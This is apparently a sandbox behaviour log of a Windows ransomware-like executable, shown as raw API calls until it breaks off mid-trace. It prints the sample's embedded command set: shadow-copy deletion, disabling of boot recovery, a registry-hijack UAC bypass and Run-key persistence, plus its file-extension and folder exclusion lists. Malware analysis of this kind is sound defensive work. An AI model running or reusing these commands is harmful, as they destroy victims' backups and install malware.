GetCurrentThreadId () returned 0xcc4 [0108.841] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.841] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x13b399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0108.841] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x13b399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0108.841] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13b39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0108.843] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13b39b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 
[0108.844] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13b39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0108.845] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13b39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0108.846] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13b39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0108.847] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13b39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0108.848] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13b39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0108.848] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13b39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0108.849] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13b39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0108.853] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x139c63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0108.853] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x139c63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0108.853] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x139c63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0108.853] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x139c63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0108.853] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0108.853] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0108.853] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0108.853] LockResource 
(hResData=0x50d72c) returned 0x50d72c [0108.853] FreeResource (hResData=0x50d72c) returned 0 [0108.853] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0108.853] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0108.853] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0108.853] LockResource (hResData=0x50d64c) returned 0x50d64c [0108.853] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1405008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0108.853] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1405008, cbMultiByte=38, lpWideCharStr=0x13fdeac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0108.853] FreeResource (hResData=0x50d64c) returned 0 [0108.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x140500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0108.853] GetCurrentThreadId () returned 0xcc4 [0108.853] GetCurrentThreadId () returned 0xcc4 [0108.853] GetCurrentThreadId () returned 0xcc4 [0108.854] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x139e688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0108.854] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x139e688, cbMultiByte=1410, lpWideCharStr=0x13b9afc, cchWideChar=1410 | out: 
lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0108.854] GetCurrentThreadId () returned 0xcc4 [0108.854] GetCurrentThreadId () returned 0xcc4 [0108.854] GetCurrentThreadId () returned 0xcc4 [0108.854] GetCurrentThread () returned 0xfffffffe [0108.854] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0108.854] GetLastError () returned 0x3f0 [0108.854] GetCurrentProcess () 
returned 0xffffffff [0108.854] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0108.854] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x13b7ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x13b7ae0, ReturnLength=0x12fc60) returned 1 [0108.854] CloseHandle (hObject=0xb8) returned 1 [0108.854] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x2f6468*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0108.854] EqualSid (pSid1=0x2f6468*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13b7b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0108.854] EqualSid (pSid1=0x2f6468*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13b7b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0108.854] EqualSid (pSid1=0x2f6468*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13b7b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), 
SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0108.855] GetCurrentProcess () returned 0xffffffff [0108.855] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0108.855] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0108.855] GetLastError () returned 0x7a [0108.855] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x2f7708 [0108.855] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x2f7708, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x2f7708, ReturnLength=0x12fc64) returned 1 [0108.855] GetSidSubAuthorityCount (pSid=0x2f7710*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x2f7711 [0108.855] GetSidSubAuthority (pSid=0x2f7710*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2f7718 [0108.855] LocalFree (hMem=0x2f7708) returned 0x0 [0108.855] CloseHandle (hObject=0xb8) returned 1 [0108.855] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0108.855] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0108.855] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0108.855] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0108.855] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="P:\\") 
returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0108.857] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0108.857] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0108.857] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0108.857] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0108.857] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0108.857] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0108.857] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0108.857] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0108.857] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0108.857] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0108.857] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0108.857] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0108.857] LockResource (hResData=0x516824) returned 0x516824 [0108.858] FreeResource (hResData=0x516824) returned 0 [0108.858] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0108.858] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0108.858] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0108.858] LockResource (hResData=0x50d64c) returned 0x50d64c [0108.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1405008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0108.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1405008, cbMultiByte=38, lpWideCharStr=0x13fdeac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0108.858] FreeResource (hResData=0x50d64c) returned 0 [0108.858] WideCharToMultiByte (in: 
CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x140500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0108.858] GetCurrentThreadId () returned 0xcc4 [0108.858] GetCurrentThreadId () returned 0xcc4 [0108.858] GetCurrentThreadId () returned 0xcc4 [0108.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1390128, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0108.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1390128, cbMultiByte=615, lpWideCharStr=0x139c65c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", 
cchCount2=10) returned 2 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", 
cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, 
